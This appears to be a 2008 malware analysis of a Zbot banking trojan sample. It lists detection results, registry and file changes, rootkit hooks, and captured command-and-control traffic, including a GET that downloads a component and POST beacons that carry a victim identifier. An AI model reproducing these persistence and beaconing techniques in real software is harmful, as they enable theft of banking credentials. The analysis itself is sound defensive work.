<h4>
File details
</h4>Filename: fgltqn.exe
Additional information
File size: 50688 bytes
MD5...: 3c9789e1ee979134439cd5049104cb88
SHA1..: 44957eb4b1dd6219db7abf2c579817d237e9e8f7
SHA256: 05fb91f442ae1f7b1ee14d935fec13e9a68d1d8eae593a7af82a7a3239e2137b
PEiD: -
<h4>QUOTEFile fgltqn.exe received on 08.25.2008 02:05:47 (CET)
Antivirus Version Last Update Result
AhnLab-V3 2008.8.21.0 2008.08.22 -
AntiVir 7.8.1.23 2008.08.24 TR/Spy.ZBot.ecn
Authentium 5.1.0.4 2008.08.24 -
Avast 4.8.1195.0 2008.08.24 Win32:Spyware-gen
AVG 8.0.0.161 2008.08.24 PSW.Generic6.YGV
BitDefender 7.2 2008.08.25 Trojan.Spy.ZBot.JR
CAT-QuickHeal 9.50 2008.08.22 TrojanSpy.Zbot.ecn
ClamAV 0.93.1 2008.08.24 -
DrWeb 4.44.0.09170 2008.08.24 -
eSafe 7.0.17.0 2008.08.24 -
eTrust-Vet 31.6.6044 2008.08.23 -
Ewido 4.0 2008.08.24 -
F-Prot 4.4.4.56 2008.08.25 -
F-Secure 7.60.13501.0 2008.08.24 Trojan-Spy.Win32.Zbot.ecn
Fortinet 3.14.0.0 2008.08.24 PossibleThreat
GData 2.0.7306.1023 2008.08.20 Trojan-Spy.Win32.Zbot.ecn
Ikarus T3.1.1.34.0 2008.08.24 Trojan-Spy.Win32.Zbot.ecn
K7AntiVirus 7.10.427 2008.08.23 -
Kaspersky 7.0.0.125 2008.08.25 Trojan-Spy.Win32.Zbot.ecn
McAfee 5368 2008.08.22 -
Microsoft 1.3807 2008.08.25 -
NOD32v2 3383 2008.08.24 -
Norman 5.80.02 2008.08.22 W32/Zbot.AXX
Panda 9.0.0.4 2008.08.24 -
PCTools 4.4.2.0 2008.08.24 Trojan-Spy.Zbot!sd6
Prevx1 V2 2008.08.25 Malicious Software
Rising 20.58.62.00 2008.08.24 -
Sophos 4.32.0 2008.08.25 -
Sunbelt 3.1.1575.1 2008.08.23 -
Symantec 10 2008.08.24 -
TheHacker 6.3.0.6.060 2008.08.23 -
TrendMicro 8.700.0.1004 2008.08.23 -
VBA32 3.12.8.4 2008.08.23 Trojan-Spy.Win32.Zbot.ecn
ViRobot 2008.8.22.1346 2008.08.22 Spyware.Zbot.50688.E
VirusBuster 4.5.11.0 2008.08.24 -
Webwasher-Gateway 6.6.2 2008.08.24 Trojan.Spy.ZBot.ecn
Visible signs
</h4>Logfile of Trend Micro HijackThis v2.0.2
....
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\oembios.exe,
O4 - HKCU\..\Run: [userinit] C:\WINDOWS\system32\oembios.exe
O4 - HKUS\S-1-5-18\..\Run: [userinit] C:\WINDOWS\system32\oembios.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [userinit] C:\WINDOWS\system32\oembios.exe (User 'Default user')
Note: In some cases the O4 entries might not be present.
<h4>
Technical details
</h4>Registry changes.
- Keys added.QUOTEHKEY_USERS\.DEFAULT\Software\Microsoft\Protected Storage System Provider
HKEY_USERS\.DEFAULT\Software\Microsoft\Protected Storage System Provider\S-1-5-18
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\{19127AD2-394B-70F5-C650-B97867BAA1F7}
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6}
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\{BCCE7320-487C-3BA7-632A-CF4905AF9CB8}
HKEY_USERS\S-1-5-18\Software\Microsoft\Protected Storage System Provider
HKEY_USERS\S-1-5-18\Software\Microsoft\Protected Storage System Provider\S-1-5-18
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\{19127AD2-394B-70F5-C650-B97867BAA1F7}
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6}
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\{BCCE7320-487C-3BA7-632A-CF4905AF9CB8}
HKEY_USERS\S-1-5-19\Software\Microsoft\Protected Storage System Provider
HKEY_USERS\S-1-5-19\Software\Microsoft\Protected Storage System Provider\S-1-5-19 - Adds different entries to ensure survival upon reboot.QUOTEHKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run "userinit"
Type: REG_SZ
Data: C:\WINDOWS\system32\oembios.exe
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run "userinit"
Type: REG_SZ
Data: C:\WINDOWS\system32\oembios.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "userinit"
Type: REG_SZ
Data: C:\WINDOWS\system32\oembios.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Userinit"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\WINDOWS\system32\userinit.exe,
New data: C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\oembios.exe, - Creates an unique ID to identify the victim. This string is composed of the computername and some random numbers / letters and will be used when uploading information to the server.QUOTEHKEY_USERS\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Network "UID"
Type: REG_SZ
Data: %computername%_000175EF
HKEY_USERS\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Network "UID"
Type: REG_SZ
Data: %computername%_000148FD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Network "UID"
Type: REG_SZ
Data: %computername%_0001480C - Modifies the location of the following folders.QUOTEHKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "AppData"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\NetworkService\Application Data
New data: C:\Documents and Settings\LocalService\Application Data
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cache"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files
New data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cookies"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\NetworkService\Cookies
New data: C:\Documents and Settings\LocalService\Cookies
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "History"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\NetworkService\Local Settings\History
New data: C:\Documents and Settings\LocalService\Local Settings\History
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "AppData"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\NetworkService\Application Data
New data: C:\Documents and Settings\LocalService\Application Data
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cache"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files
New data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "Cookies"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\NetworkService\Cookies
New data: C:\Documents and Settings\LocalService\Cookies
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders "History"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\NetworkService\Local Settings\History
New data: C:\Documents and Settings\LocalService\Local Settings\History
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths "Directory"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5
New data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1 "CacheLimit"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 00, 32, 00, 00
New data: 97, FF, 07, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1 "CachePath"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\Cache1
New data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2 "CacheLimit"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 00, 32, 00, 00
New data: 97, FF, 07, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2 "CachePath"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\Cache2
New data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3 "CacheLimit"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 00, 32, 00, 00
New data: 97, FF, 07, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3 "CachePath"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\Cache3
New data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4 "CacheLimit"
Old type: REG_DWORD
New type: REG_DWORD
Old data: 00, 32, 00, 00
New data: 97, FF, 07, 00
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4 "CachePath"
Old type: REG_SZ
New type: REG_SZ
Old data: C:\Documents and Settings\KLY\Local Settings\Temporary Internet Files\Content.IE5\Cache4
New data: C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4 - Misc. Values added.QUOTEHKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\{19127AD2-394B-70F5-C650-B97867BAA1F7} "{02FFAC45-0B10-5633-4296-1801F1A36678}"
Type: REG_BINARY
Data: ö ó
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} "{E716FA10-2031-AA96-8E72-93A205C5C62C}"
Type: REG_BINARY
Data: G ò
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} "{F710FA10-2031-3106-8872-93A2B5C5C620}"
Type: REG_BINARY
Data: ÷ ò
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\{BCCE7320-487C-3BA7-632A-CF4905AF9CB8} "{E716FA10-2031-AA96-8E72-93A205C5C62C}"
Type: REG_BINARY
Data: G ò
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\{BCCE7320-487C-3BA7-632A-CF4905AF9CB8} "{F710FA10-2031-3106-8872-93A2B5C5C620}"
Type: REG_BINARY
Data: ÷ ò
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\{19127AD2-394B-70F5-C650-B97867BAA1F7} "{02FFAC45-0B10-5633-4296-1801F1A36678}"
Type: REG_BINARY
Data: ö ó
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} "{E716FA10-2031-AA96-8E72-93A205C5C62C}"
Type: REG_BINARY
Data: G ò
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\{43BF8CD1-C5D5-2230-7BB2-98F22C2B7DC6} "{F710FA10-2031-3106-8872-93A2B5C5C620}"
Type: REG_BINARY
Data: ÷ ò
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\{BCCE7320-487C-3BA7-632A-CF4905AF9CB8} "{E716FA10-2031-AA96-8E72-93A205C5C62C}"
Type: REG_BINARY
Data: G ò
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\{BCCE7320-487C-3BA7-632A-CF4905AF9CB8} "{F710FA10-2031-3106-8872-93A2B5C5C620}"
Type: REG_BINARY
Data: ÷ ò
Files added.QUOTE%Profiles%\LocalService\Application Data\sysproc64
Files in red are hidden.QUOTE%Profiles%\LocalService\Application Data\sysproc64\sysproc32.sys
Date: 8/25/2008 5:44 PM
Size: 104 bytes
%System%\oembios.exe
%System%\sysproc64\sysproc32.sys
%System%\sysproc64\sysproc86.sys
Files deleted.
Files changed.QUOTE%Profiles%\[USERNAME]\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol
Note: %Profiles% is a variable that refers to the file system directory containing user profile folders. A typical path is C:\Documents and Settings.QUOTE%System%\drivers\etc\hosts
Old date: 8/4/2004 2:00 PM
New date: 8/25/2008 5:45 PM
Old size: 734 bytes
New size: 6,393 bytes
%System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).
<h4>
Rootkit Scan
</h4>GMER 1.0.14.14536 - http://www.gmer.netNote: Other executables will appear as hooked under IAT depending on the programs running..
Rootkit scan 2008-08-25 18:04:50
Windows 5.1.2600 Service Pack 2
---- User IAT/EAT - GMER 1.0.14 ----
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\services.exe [ntdll.dll!NtQueryDirectoryFile] 0075492C
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtQueryDirectoryFile] 0075492C
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 007548BE
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrGetProcedureAddress] 00754880
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 0075484D
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 00753867
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!TranslateMessage] 00753B46
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!TranslateMessage] 00753B46
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetClipboardData] 00753867
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!TranslateMessage] 00753B46
IAT C:\WINDOWS\system32\services.exe[612] @ C:\WINDOWS\system32\WS2HELP.dll [ntdll.dll!NtQueryDirectoryFile] 0075492C
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtQueryDirectoryFile] 00B2492C
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 00B248BE
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrGetProcedureAddress] 00B24880
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 00B2484D
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\LSASRV.dll [ntdll.dll!LdrLoadDll] 00B248BE
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\SAMSRV.dll [ntdll.dll!LdrLoadDll] 00B248BE
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\SAMSRV.dll [ntdll.dll!LdrGetProcedureAddress] 00B24880
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\WS2HELP.dll [ntdll.dll!NtQueryDirectoryFile] 00B2492C
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 00B23867
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!TranslateMessage] 00B23B46
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!TranslateMessage] 00B23B46
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetClipboardData] 00B23867
IAT C:\WINDOWS\system32\lsass.exe[624] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!TranslateMessage] 00B23B46
IAT C:\WINDOWS\system32\svchost.exe[780] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 00C9484D
IAT C:\WINDOWS\system32\svchost.exe[840] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtQueryDirectoryFile] 0089492C
IAT C:\WINDOWS\system32\svchost.exe[840] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 008948BE
IAT C:\WINDOWS\system32\svchost.exe[840] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrGetProcedureAddress] 00894880
IAT C:\WINDOWS\system32\svchost.exe[840] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 0089484D
IAT C:\WINDOWS\system32\svchost.exe[840] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 00893867
IAT C:\WINDOWS\system32\svchost.exe[840] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!TranslateMessage] 00893B46
IAT C:\WINDOWS\system32\svchost.exe[840] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!TranslateMessage] 00893B46
IAT C:\WINDOWS\system32\svchost.exe[840] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetClipboardData] 00893867
IAT C:\WINDOWS\system32\svchost.exe[840] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!TranslateMessage] 00893B46
IAT C:\WINDOWS\system32\svchost.exe[840] @ c:\windows\system32\WS2HELP.dll [ntdll.dll!NtQueryDirectoryFile] 0089492C
IAT C:\WINDOWS\System32\svchost.exe[936] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtQueryDirectoryFile] 014B492C
IAT C:\WINDOWS\System32\svchost.exe[936] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 014B48BE
IAT C:\WINDOWS\System32\svchost.exe[936] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrGetProcedureAddress] 014B4880
IAT C:\WINDOWS\System32\svchost.exe[936] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 014B484D
IAT C:\WINDOWS\System32\svchost.exe[936] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 014B3867
IAT C:\WINDOWS\System32\svchost.exe[936] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!TranslateMessage] 014B3B46
IAT C:\WINDOWS\System32\svchost.exe[936] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!TranslateMessage] 014B3B46
IAT C:\WINDOWS\System32\svchost.exe[936] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetClipboardData] 014B3867
IAT C:\WINDOWS\System32\svchost.exe[936] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!TranslateMessage] 014B3B46
IAT C:\WINDOWS\System32\svchost.exe[936] @ c:\windows\system32\WS2HELP.dll [ntdll.dll!NtQueryDirectoryFile] 014B492C
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\Explorer.EXE [USER32.dll!TranslateMessage] 011E3B46
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtQueryDirectoryFile] 011E492C
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 011E48BE
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrGetProcedureAddress] 011E4880
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 011E484D
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!TranslateMessage] 011E3B46
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!TranslateMessage] 011E3B46
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetClipboardData] 011E3867
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 011E3867
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!TranslateMessage] 011E3B46
IAT C:\WINDOWS\Explorer.EXE[1232] @ C:\WINDOWS\system32\WS2HELP.dll [ntdll.dll!NtQueryDirectoryFile] 011E492C
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtQueryDirectoryFile] 007B492C
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrLoadDll] 007B48BE
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!LdrGetProcedureAddress] 007B4880
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\system32\kernel32.dll [ntdll.dll!NtCreateThread] 007B484D
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!GetClipboardData] 007B3867
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\system32\ole32.dll [USER32.dll!TranslateMessage] 007B3B46
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\System32\WS2HELP.dll [ntdll.dll!NtQueryDirectoryFile] 007B492C
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!TranslateMessage] 007B3B46
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetClipboardData] 007B3867
IAT C:\WINDOWS\System32\alg.exe[2024] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!TranslateMessage] 007B3B46
---- Threads - GMER 1.0.14 ----
Thread 1608:236 003547D2
Thread 1608:1004 003947D2
Thread 1608:428 003D47D2
---- Files - GMER 1.0.14 ----
File C:\WINDOWS\system32\oembios.exe 379904 bytes executable
File C:\WINDOWS\system32\sysproc64 0 bytes
File C:\WINDOWS\system32\sysproc64\sysproc32.sys 0 bytes
File C:\WINDOWS\system32\sysproc64\sysproc86.sys 18943 bytes
---- EOF - GMER 1.0.14 ----
<h4>
Notes
</h4>Trojan-Spy.Win32.Zbot.ajd is a rootkit / banking trojan that
- may disable the firewall. (1)
- steals sensitive financial data (credit card numbers, online banking login details).
- makes screen snapshots.
- downloads additional components.
- provides remote access to the compromised system.
- previous versions were able to send out spam with their build-in SMTP engine.
New memory pages are created in several exe files.
- %System%\services.exe
- %System%\lsass.exe
- %System%\svchost.exe
- %System%\smss.exe
The infection creates a mutex under the winlogon process and we also see sysproc32.sys & sysproc86.sys loaded under winlogon.exe.CODEGET /htyyfqltnt/rjyabu.bin HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: domain12.net
Pragma: no-cache
HTTP/1.1 200 OK
Date: Mon, 25 Aug 2008 19:31:24 GMT
Server: Apache/2.2.9 (Debian) mod_fastcgi/2.4.6 PHP/5.2.6-2 with Suhosin-Patch
Last-Modified: Mon, 18 Aug 2008 04:31:06 GMT
ETag: "e888f0-49ff-454b4708d5680"
Accept-Ranges: bytes
Content-Length: 18943
Connection: close
Content-Type: application/octet-stream
A mutex is created under one of the svchost processes also.
The trojan will report back information to a server, using the unique identifier.
______________________________CODEPOST /nenfptdc/s.php?1=%computername%_0001480c&i=MAIN
POST /nenfptdc/s.php?2=%computername%_0001480c&n=0&v=16842752&i=MAIN&s=0&sp=0&lcp=0&pr=0
(1) After reboot the firewall might be completely disabled and when I wanted to enable the different components again I was denied access.
(2) If for a reason or another the infection can't perform some tasks, you might get a forced reboot initiated by NT AUTHORITY\SYSTEM.
Thx fly out to Cretemonster for the dropper.
